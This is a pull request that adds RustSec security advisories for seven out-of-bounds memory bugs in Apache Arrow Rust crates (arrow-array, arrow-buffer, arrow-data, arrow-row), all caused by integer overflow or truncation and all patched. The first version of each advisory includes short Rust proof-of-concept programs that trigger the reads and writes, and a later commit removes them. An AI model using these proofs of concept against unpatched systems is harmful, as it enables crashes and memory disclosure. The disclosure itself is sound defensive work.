### PR TITLE
Add advisories for arrow-array, arrow-buffer, arrow-data, arrow-row

### DIFF
--- a/crates/arrow-array/RUSTSEC-0000-0000.md
+++ b/crates/arrow-array/RUSTSEC-0000-0000.md
@@ -1,0 +1,44 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "arrow-array"
+date = "2026-04-22"
+url = "https://github.com/apache/arrow-rs/issues/9898"
+references = ["https://github.com/apache/arrow-rs/pull/9872", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+categories = ["memory-corruption"]
+keywords = ["out-of-bounds", "integer-overflow", "i32-truncation"]
+
+[affected.functions]
+"arrow_array::array::fixed_size_binary_array::FixedSizeBinaryArray::value" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+
+[versions]
+patched = [">= 58.3.0", ">= 57.3.1, < 58.0.0", ">= 56.2.1, < 57.0.0"]
+```
+
+# `FixedSizeBinaryArray::value()` out-of-bounds read via `i32` offset truncation
+
+`FixedSizeBinaryArray::value_offset_at()` casts the index to `i32` before
+multiplying by the element width. For arrays with more than `i32::MAX`
+elements, this truncation produces a negative byte offset, causing `value()`
+to read memory before the start of the value buffer.
+
+The issue is reachable entirely through safe Rust APIs (`#![forbid(unsafe_code)]`).
+A buffer of approximately 2 GiB is sufficient to trigger the out-of-bounds read.
+
+## Proof of Concept
+
+```rust
+#![forbid(unsafe_code)]
+
+use arrow_array::FixedSizeBinaryArray;
+use arrow_buffer::Buffer;
+
+fn main() {
+    let buf = Buffer::from_vec(vec![0x41u8; (i32::MAX as usize) + 2]);
+    let arr = FixedSizeBinaryArray::new(1, buf, None);
+
+    // i as i32 truncates to i32::MIN → ptr.offset(negative) → OOB read
+    let v = arr.value(i32::MAX as usize + 1);
+    println!("{:?}", v);
+}
+```

--- a/crates/arrow-array/RUSTSEC-0000-0000.md
+++ b/crates/arrow-array/RUSTSEC-0000-0000.md
@@ -24,21 +24,3 @@ to read memory before the start of the value buffer.
 
 The issue is reachable entirely through safe Rust APIs (`#![forbid(unsafe_code)]`).
 A buffer of approximately 2 GiB is sufficient to trigger the out-of-bounds read.
-
-## Proof of Concept
-
-```rust
-#![forbid(unsafe_code)]
-
-use arrow_array::FixedSizeBinaryArray;
-use arrow_buffer::Buffer;
-
-fn main() {
-    let buf = Buffer::from_vec(vec![0x41u8; (i32::MAX as usize) + 2]);
-    let arr = FixedSizeBinaryArray::new(1, buf, None);
-
-    // i as i32 truncates to i32::MIN → ptr.offset(negative) → OOB read
-    let v = arr.value(i32::MAX as usize + 1);
-    println!("{:?}", v);
-}
-```

--- a/crates/arrow-buffer/RUSTSEC-0000-0000.md
+++ b/crates/arrow-buffer/RUSTSEC-0000-0000.md
@@ -1,0 +1,81 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "arrow-buffer"
+date = "2026-04-22"
+url = "https://github.com/apache/arrow-rs/issues/9897"
+references = ["https://github.com/apache/arrow-rs/issues/9903", "https://github.com/apache/arrow-rs/issues/9904", "https://github.com/apache/arrow-rs/pull/9820", "https://github.com/apache/arrow-rs/pull/9819", "https://github.com/apache/arrow-rs/pull/9818", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+categories = ["memory-corruption"]
+keywords = ["out-of-bounds", "integer-overflow"]
+
+[affected.functions]
+"arrow_buffer::builder::BufferBuilder::reserve" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+"arrow_buffer::buffer::mutable::MutableBuffer::repeat_slice_n_times" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+"arrow_buffer::bit_chunk_iterator::BitChunks::new" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+
+[versions]
+patched = [">= 58.3.0", ">= 57.3.1, < 58.0.0", ">= 56.2.1, < 57.0.0"]
+```
+
+# Multiple `usize` arithmetic overflows in `arrow-buffer` lead to out-of-bounds memory access
+
+Three functions in `arrow-buffer` use unchecked `usize` arithmetic that can
+overflow, bypassing bounds guards and causing out-of-bounds reads or writes.
+All issues are reachable through safe Rust APIs (`#![forbid(unsafe_code)]`),
+though they require `usize::MAX`-scale inputs that are not practically
+constructible on 64-bit systems.
+
+## 1. `BufferBuilder::reserve()` — OOB Write
+
+`self.len + additional` wraps to zero, skipping reallocation.
+Subsequent writes via `as_slice_mut()` access memory beyond the allocation.
+
+```rust
+#![forbid(unsafe_code)]
+use arrow_buffer::builder::BufferBuilder;
+
+fn main() {
+    let mut b = BufferBuilder::<u64>::new(1);
+    b.append_n_zeroed(1);
+    // self.len + additional wraps to 0 → no reallocation
+    b.append_n_zeroed(usize::MAX / std::mem::size_of::<u64>());
+    let s = b.as_slice_mut();
+    s[8] = 1; // OOB write
+}
+```
+
+## 2. `MutableBuffer::repeat_slice_n_times()` — OOB Write
+
+`repeat_count * bytes_to_repeat` wraps to zero, causing `reserve(0)` to skip
+reallocation. The internal doubling loop writes past the allocation.
+
+```rust
+#![forbid(unsafe_code)]
+use arrow_buffer::buffer::MutableBuffer;
+
+fn main() {
+    let mut buf = MutableBuffer::new(0);
+    let one: [u64; 1] = [0x0000000000000000];
+    // repeat_count * 8 wraps to 0 → reserve(0) → OOB write
+    buf.repeat_slice_n_times(&one, usize::MAX / 8 + 1);
+}
+```
+
+## 3. `BitChunks::new()` — OOB Read
+
+`offset + len` wraps in `assert!(ceil(offset+len, 8) <= buffer.len())`,
+allowing construction of a `BitChunks` iterator that reads past the buffer.
+
+```rust
+#![forbid(unsafe_code)]
+use arrow_buffer::Buffer;
+use arrow_buffer::bit_chunk_iterator::BitChunks;
+
+fn main() {
+    let buf = Buffer::from(vec![0x41u8; 8]);
+    // offset + len wraps to 0 → assert passes → OOB read
+    let chunks = BitChunks::new(buf.as_slice(), 1, usize::MAX);
+    let first = chunks.iter().next();
+    println!("{:?}", first);
+}
+```

--- a/crates/arrow-buffer/RUSTSEC-0000-0000.md
+++ b/crates/arrow-buffer/RUSTSEC-0000-0000.md
@@ -5,6 +5,7 @@ package = "arrow-buffer"
 date = "2026-04-22"
 url = "https://github.com/apache/arrow-rs/issues/9897"
 references = ["https://github.com/apache/arrow-rs/issues/9903", "https://github.com/apache/arrow-rs/issues/9904", "https://github.com/apache/arrow-rs/pull/9820", "https://github.com/apache/arrow-rs/pull/9819", "https://github.com/apache/arrow-rs/pull/9818", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+informational = "unsound"
 categories = ["memory-corruption"]
 keywords = ["out-of-bounds", "integer-overflow"]
 
@@ -30,52 +31,12 @@ constructible on 64-bit systems.
 `self.len + additional` wraps to zero, skipping reallocation.
 Subsequent writes via `as_slice_mut()` access memory beyond the allocation.
 
-```rust
-#![forbid(unsafe_code)]
-use arrow_buffer::builder::BufferBuilder;
-
-fn main() {
-    let mut b = BufferBuilder::<u64>::new(1);
-    b.append_n_zeroed(1);
-    // self.len + additional wraps to 0 → no reallocation
-    b.append_n_zeroed(usize::MAX / std::mem::size_of::<u64>());
-    let s = b.as_slice_mut();
-    s[8] = 1; // OOB write
-}
-```
-
 ## 2. `MutableBuffer::repeat_slice_n_times()` — OOB Write
 
 `repeat_count * bytes_to_repeat` wraps to zero, causing `reserve(0)` to skip
 reallocation. The internal doubling loop writes past the allocation.
 
-```rust
-#![forbid(unsafe_code)]
-use arrow_buffer::buffer::MutableBuffer;
-
-fn main() {
-    let mut buf = MutableBuffer::new(0);
-    let one: [u64; 1] = [0x0000000000000000];
-    // repeat_count * 8 wraps to 0 → reserve(0) → OOB write
-    buf.repeat_slice_n_times(&one, usize::MAX / 8 + 1);
-}
-```
-
 ## 3. `BitChunks::new()` — OOB Read
 
 `offset + len` wraps in `assert!(ceil(offset+len, 8) <= buffer.len())`,
 allowing construction of a `BitChunks` iterator that reads past the buffer.
-
-```rust
-#![forbid(unsafe_code)]
-use arrow_buffer::Buffer;
-use arrow_buffer::bit_chunk_iterator::BitChunks;
-
-fn main() {
-    let buf = Buffer::from(vec![0x41u8; 8]);
-    // offset + len wraps to 0 → assert passes → OOB read
-    let chunks = BitChunks::new(buf.as_slice(), 1, usize::MAX);
-    let first = chunks.iter().next();
-    println!("{:?}", first);
-}
-```

--- a/crates/arrow-data/RUSTSEC-0000-0000.md
+++ b/crates/arrow-data/RUSTSEC-0000-0000.md
@@ -1,0 +1,88 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "arrow-data"
+date = "2026-04-22"
+url = "https://github.com/apache/arrow-rs/issues/9899"
+references = ["https://github.com/apache/arrow-rs/pull/9813", "https://github.com/apache/arrow-rs/pull/9816", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+categories = ["memory-corruption"]
+keywords = ["out-of-bounds", "integer-overflow"]
+
+[affected.functions]
+"arrow_data::data::ArrayData::try_new" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+"arrow_data::data::ArrayData::slice" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+
+[versions]
+patched = [">= 58.3.0", ">= 57.3.1, < 58.0.0", ">= 56.2.1, < 57.0.0"]
+```
+
+# `usize` overflow in `ArrayData::try_new()` and `ArrayData::slice()` bypasses bounds validation
+
+Two functions in `arrow-data` use unchecked `usize` addition that can
+overflow, bypassing bounds guards and producing invalid `ArrayData`.
+Both issues are reachable through safe Rust APIs (`#![forbid(unsafe_code)]`),
+though they require `usize::MAX`-scale inputs that are not practically
+constructible on 64-bit systems.
+
+## 1. `ArrayData::try_new()` — OOB Read
+
+When `len` is `usize::MAX`, `self.len + 1` wraps to zero in `typed_offsets()`,
+causing offset validation to short-circuit and accept a malformed `ArrayData`.
+
+```rust
+#![forbid(unsafe_code)]
+use arrow_array::BinaryArray;
+use arrow_buffer::Buffer;
+use arrow_data::ArrayData;
+use arrow_schema::DataType;
+
+fn main() {
+    let offsets = Buffer::from_slice_ref([0i32]);
+    let values = Buffer::from_iter(std::iter::empty::<u8>());
+    let data = ArrayData::try_new(
+        DataType::Binary,
+        usize::MAX,
+        None,
+        1,
+        vec![offsets, values],
+        vec![],
+    ).expect("incorrectly accepted");
+
+    let arr = BinaryArray::from(data);
+    arr.value(1000); // OOB read
+}
+```
+
+## 2. `ArrayData::slice()` — OOB Read
+
+`offset + length` wraps in `assert!((offset + length) <= self.len())`,
+producing a slice with `len = usize::MAX` that reads past underlying buffers.
+
+```rust
+#![forbid(unsafe_code)]
+use arrow_array::BinaryArray;
+use arrow_buffer::Buffer;
+use arrow_data::ArrayData;
+use arrow_schema::DataType;
+
+fn main() {
+    let base = ArrayData::try_new(
+        DataType::Binary,
+        4,
+        None,
+        0,
+        vec![
+            Buffer::from_slice_ref([0i32, 1, 2, 3, 4]),
+            Buffer::from_slice_ref(b"ABCD"),
+        ],
+        vec![],
+    ).unwrap();
+
+    let s1 = base.slice(1, 3);
+    // offset + length wraps → assert passes → OOB
+    let evil = s1.slice(1, usize::MAX);
+
+    let arr = BinaryArray::from(evil);
+    let v = arr.value(1024); // OOB read
+}
+```

--- a/crates/arrow-data/RUSTSEC-0000-0000.md
+++ b/crates/arrow-data/RUSTSEC-0000-0000.md
@@ -5,6 +5,7 @@ package = "arrow-data"
 date = "2026-04-22"
 url = "https://github.com/apache/arrow-rs/issues/9899"
 references = ["https://github.com/apache/arrow-rs/pull/9813", "https://github.com/apache/arrow-rs/pull/9816", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+informational = "unsound"
 categories = ["memory-corruption"]
 keywords = ["out-of-bounds", "integer-overflow"]
 
@@ -29,60 +30,7 @@ constructible on 64-bit systems.
 When `len` is `usize::MAX`, `self.len + 1` wraps to zero in `typed_offsets()`,
 causing offset validation to short-circuit and accept a malformed `ArrayData`.
 
-```rust
-#![forbid(unsafe_code)]
-use arrow_array::BinaryArray;
-use arrow_buffer::Buffer;
-use arrow_data::ArrayData;
-use arrow_schema::DataType;
-
-fn main() {
-    let offsets = Buffer::from_slice_ref([0i32]);
-    let values = Buffer::from_iter(std::iter::empty::<u8>());
-    let data = ArrayData::try_new(
-        DataType::Binary,
-        usize::MAX,
-        None,
-        1,
-        vec![offsets, values],
-        vec![],
-    ).expect("incorrectly accepted");
-
-    let arr = BinaryArray::from(data);
-    arr.value(1000); // OOB read
-}
-```
-
 ## 2. `ArrayData::slice()` — OOB Read
 
 `offset + length` wraps in `assert!((offset + length) <= self.len())`,
 producing a slice with `len = usize::MAX` that reads past underlying buffers.
-
-```rust
-#![forbid(unsafe_code)]
-use arrow_array::BinaryArray;
-use arrow_buffer::Buffer;
-use arrow_data::ArrayData;
-use arrow_schema::DataType;
-
-fn main() {
-    let base = ArrayData::try_new(
-        DataType::Binary,
-        4,
-        None,
-        0,
-        vec![
-            Buffer::from_slice_ref([0i32, 1, 2, 3, 4]),
-            Buffer::from_slice_ref(b"ABCD"),
-        ],
-        vec![],
-    ).unwrap();
-
-    let s1 = base.slice(1, 3);
-    // offset + length wraps → assert passes → OOB
-    let evil = s1.slice(1, usize::MAX);
-
-    let arr = BinaryArray::from(evil);
-    let v = arr.value(1024); // OOB read
-}
-```

--- a/crates/arrow-row/RUSTSEC-0000-0000.md
+++ b/crates/arrow-row/RUSTSEC-0000-0000.md
@@ -1,0 +1,47 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "arrow-row"
+date = "2026-04-22"
+url = "https://github.com/apache/arrow-rs/issues/9901"
+references = ["https://github.com/apache/arrow-rs/pull/9817", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+categories = ["memory-corruption"]
+keywords = ["out-of-bounds", "integer-overflow"]
+
+[affected.functions]
+"arrow_row::Rows::row" = ["< 56.2.1, >= 56.0.0", "< 57.3.1, >= 57.0.0", "< 58.3.0, >= 58.0.0"]
+
+[versions]
+patched = [">= 58.3.0", ">= 57.3.1, < 58.0.0", ">= 56.2.1, < 57.0.0"]
+```
+
+# `usize` overflow in `Rows::row()` bypasses bounds check, causes out-of-bounds read
+
+`Rows::row()` checks `assert!(row + 1 < self.offsets.len())` before calling
+`row_unchecked()`. When `row` is `usize::MAX`, `row + 1` wraps to zero,
+and the assertion `0 < 1` passes. The subsequent call to
+`row_unchecked(usize::MAX)` uses `get_unchecked(usize::MAX)` on the offsets
+array, causing an out-of-bounds read.
+
+The issue is reachable through the safe `row()` method
+(`#![forbid(unsafe_code)]`), though it requires passing `usize::MAX` as the
+row index, which is not practically reachable through normal Arrow operations
+on 64-bit systems.
+
+## Proof of Concept
+
+```rust
+#![forbid(unsafe_code)]
+use arrow_row::{RowConverter, SortField};
+use arrow_schema::DataType;
+
+fn main() {
+    let converter = RowConverter::new(vec![
+        SortField::new(DataType::Int32),
+    ]).unwrap();
+    let rows = converter.empty_rows(0, 0);
+
+    // row + 1 wraps to 0 → assert passes → get_unchecked(usize::MAX) → OOB read
+    let r = rows.row(usize::MAX);
+}
+```

--- a/crates/arrow-row/RUSTSEC-0000-0000.md
+++ b/crates/arrow-row/RUSTSEC-0000-0000.md
@@ -5,6 +5,7 @@ package = "arrow-row"
 date = "2026-04-22"
 url = "https://github.com/apache/arrow-rs/issues/9901"
 references = ["https://github.com/apache/arrow-rs/pull/9817", "https://github.com/apache/arrow-rs/issues/9859", "https://github.com/apache/arrow-rs/issues/9858", "https://github.com/apache/arrow-rs/issues/9857"]
+informational = "unsound"
 categories = ["memory-corruption"]
 keywords = ["out-of-bounds", "integer-overflow"]
 
@@ -27,21 +28,3 @@ The issue is reachable through the safe `row()` method
 (`#![forbid(unsafe_code)]`), though it requires passing `usize::MAX` as the
 row index, which is not practically reachable through normal Arrow operations
 on 64-bit systems.
-
-## Proof of Concept
-
-```rust
-#![forbid(unsafe_code)]
-use arrow_row::{RowConverter, SortField};
-use arrow_schema::DataType;
-
-fn main() {
-    let converter = RowConverter::new(vec![
-        SortField::new(DataType::Int32),
-    ]).unwrap();
-    let rows = converter.empty_rows(0, 0);
-
-    // row + 1 wraps to 0 → assert passes → get_unchecked(usize::MAX) → OOB read
-    let r = rows.row(usize::MAX);
-}
-```


### PR DESCRIPTION
Seven memory safety issues in Apache Arrow Rust crates, all reachable through safe Rust APIs (`#![forbid(unsafe_code)]`).

Reported to the Arrow security team and patched in:
- `58.3.0`
- `57.3.1`
- `56.2.1`

**Note:** These issues were coordinated with the Arrow maintainers, who have completed patch releases. Filing here for ecosystem visibility, as the issues are reachable through safe Rust APIs and can result in out-of-bounds memory access confirmed with AddressSanitizer.

See also the Apache Arrow Rust security policy: https://github.com/apache/arrow-rs/security/policy